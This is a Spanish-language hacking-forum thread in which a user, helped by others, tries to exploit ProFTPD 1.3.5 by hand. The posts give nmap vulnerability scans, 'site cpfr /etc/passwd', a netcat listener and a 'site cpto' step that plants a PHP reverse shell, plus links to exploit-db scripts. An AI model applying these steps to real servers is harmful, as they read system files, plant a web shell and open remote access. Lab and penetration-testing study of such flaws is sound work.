Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: Panic0 en 21 Enero 2022, 05:43 am



Título: proftpd 1.3.5
Publicado por: Panic0 en 21 Enero 2022, 05:43 am
Hola, resulta que hace rato estoy tratando de explotar el servicio proftpd 1.3.5, pero, sin usar metasploit...Logro hacer todo bien.

Analizo puertos con nmap
Código:
sudo nmap -p- -sS --open -vvv -sV -Pn 192.168.1.2

Lanzo un script sobre el puerto 21 (ftp)
Código:
]sudo nmap -p21 -sV192.168.1.2 --script "vuln"

(Me dice que es vulnerable a remote command execution)




Me conecto al ftp
Código:
ftp 192.168.1.12 21


Y aqui, trato de enviar una reverse shell al servidor.
Código:
ftp SITE CPFR (path de la reverse)
Pero me sale
Código:
503 Bad sequence of commands.

Me quede estancado en ese paso, si alguien tiene alguna idea de que puedo hacer o algo,es bienvenida.


Gracias!!

Soy nuevo en esto, no se si estoy cometiendo un error muy basico o algo similiar!




Título: Re: proftpd 1.3.5
Publicado por: BloodSharp en 21 Enero 2022, 14:55 pm
Y aqui, trato de enviar una reverse shell al servidor.
Código:
ftp SITE CPFR (path de la reverse)
Pero me sale
Código:
503 Bad sequence of commands.

Según varios scripts de la exploitdb tenés que sacarle la palabra ftp al comando, ya que no es utilizada:

Ejemplo:
Código:
site cpfr /etc/passwd

Exploits de referencia tanto en python (https://www.exploit-db.com/exploits/49908) y metasploit con ruby (https://www.exploit-db.com/exploits/37262)


B#


Título: Re: proftpd 1.3.5
Publicado por: Panic0 en 21 Enero 2022, 17:30 pm
Según varios scripts de la exploitdb tenés que sacarle la palabra ftp al comando, ya que no es utilizada:

Ejemplo:
Código:
site cpfr /etc/passwd

Exploits de referencia tanto en python (https://www.exploit-db.com/exploits/49908) y metasploit con ruby (https://www.exploit-db.com/exploits/37262)


B#



Si lo se, pero aún así me sigue tirando error


Título: Re: proftpd 1.3.5
Publicado por: Danielㅤ en 21 Enero 2022, 19:28 pm
Hola, podrías dejarnos éste comando completo:

Código:
ftp SITE CPFR (path de la reverse)

así podamos ver como estás usando ese comando porque el error pareciera ser que tiene que ver con eso, ponlo tal cual lo estás usando.


Saludos


Título: Re: proftpd 1.3.5
Publicado por: Panic0 en 21 Enero 2022, 23:56 pm
Hola, podrías dejarnos éste comando completo:

Código:
ftp SITE CPFR (path de la reverse)

así podamos ver como estás usando ese comando porque el error pareciera ser que tiene que ver con eso, ponlo tal cual lo estás usando.


Saludos



Hola amigo, todo bien?

Logre solucionar ese problema, ahora tengo otro, resulta que cuando mando una reverse shell en php al server. Esta por algún motivo no funciona.

Lo que hice step by step.

De esta forma logro explotar esa vulnerabilidad
1)
Código:
ftp: site cpfr /etc/passwd

Abro el puerto escucha (el 4444, porque me gusta uu)
2)
Código:
nc –lvp 4444/code]


Copio una reverse shell genérica (Que trae por defecto kali)
3)  [code]ftp: site cpto /usr/share/webshells/php/php-reverse-shell.php
(Antes,claro que modifico la reverse shell)


4) Acá es donde fallo, en teoría la maquina victima me debería conectar al puerto de mi maquina. Pero no.



[/code]